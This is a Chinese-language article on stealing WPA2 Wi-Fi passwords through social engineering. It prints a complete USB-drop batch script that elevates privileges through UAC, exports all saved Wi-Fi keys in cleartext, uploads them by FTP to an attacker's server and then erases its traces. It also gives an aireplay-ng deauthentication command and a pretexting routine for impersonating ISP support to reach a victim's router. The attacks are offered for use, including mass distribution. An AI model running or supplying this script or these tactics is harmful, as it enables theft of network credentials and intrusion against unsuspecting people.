什么是社工？社工是一种根据利用受害者心理缺点，如下意识、求知欲、责任心、信赖、贪欲等开展例如蒙骗、盗取、操纵等非法行为的一种拒绝服务攻击。在无线网络安全性中也能够利用社工保证很多操作错误。下边举好多个利用社工盗取wpa2登陆密码的事例：

0×01 移动存储设备进攻

淘宝小容积u盘，在u盘中储放一个bat批处理文件，并取名为引诱人打开的题目，如：windows电脑优化、私人照片这些。实际上bat文件的內容是这一：

@echo off

>nul 2>&1 "%SYSTEMROOT%\\system32\\cacls.exe" "%SYSTEMROOT%\\system32\\config\\system"

if '%errorlevel%' NEQ '0' (

goto UACPrompt

) else ( goto gotAdmin )

:UACPrompt

echo Set UAC=CreateObject^("Shell.Application"^) > "%temp%\\getadmin.vbs"

echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\\getadmin.vbs"

"%temp%\\getadmin.vbs"

exit /B

:gotAdmin

if exist "%temp%\\getadmin.vbs" ( del "%temp%\\getadmin.vbs" )

md c:\\win

netsh wlan export profile key=clear folder=c:\\win

echo open 服务器ip>C:\\config.txt

echo user 账户>>C:\\config.txt

echo 登陆密码>>C:\\config.txt

echo mput c:\\win\\*.xml>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo bye>>C:\\config.txt

ftp -n -s:"C:\\config.txt"

del C:\\config.txt

del C:\\win\\*.xml

del %0

这一bat脚本会载入该设备联接过的wifi信息内容（包含登陆密码）装包到一个文件夹名称里并所有put到网络服务器上，随后删掉印痕和本身避免 网络服务器数据泄露。最终网络攻击就可以在自身的ftp服务器里选择自身钟意的wifi了。

进攻演试：

开启此脚本制作

弹出来cmd页面，一秒后消退（太快不太好截），bat脚本也随着消退

查询ftp服务器

wifi信息内容早已put上去了

进到网络服务器开启一个xml文件

就取得了登陆密码

能够自身在里面加上作用使社工实际效果更强，比如脚本制作名字取名为某某某企业有奖活动调查问卷，并加上开启问卷调查的指令，使进攻不露痕迹。

若网络攻击将脚本制作拷入好几个U盘后普遍撒网捕鱼，就可以得到该大城市的很多wifi信息内容，危害巨大。

0×02 直接接触受害人

1.应用Deauthentication进攻

aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0

在下班了歇息的情况下（这个时候广泛在应用互联网）对受害人应用断开连接进攻，等一小时后去叩门，了解互联网是不是常见故障，了解互联网是哪个企业配备的，随后宣称自身的互联网也常见故障了，是一样的企业，随后了解报障电話并拨通，实际上拨通的是别人或压根沒有拨通，随后装作是质保工作人员提醒让自身路由器重启，网络攻击就可以触碰到受害人无线路由器，好运气得话无线路由器反面有pin码，就可以撤离了。要是没有，网络攻击就进一步施加压力，装作被质保工作人员提醒打开路由器管理方法页面在管理方法页面路由器重启，乘飞机见到登陆密码。重新启动结束后手机上ssh连接kali终止进攻，导致重新启动取得成功恢复互联网的错觉，随后撤离。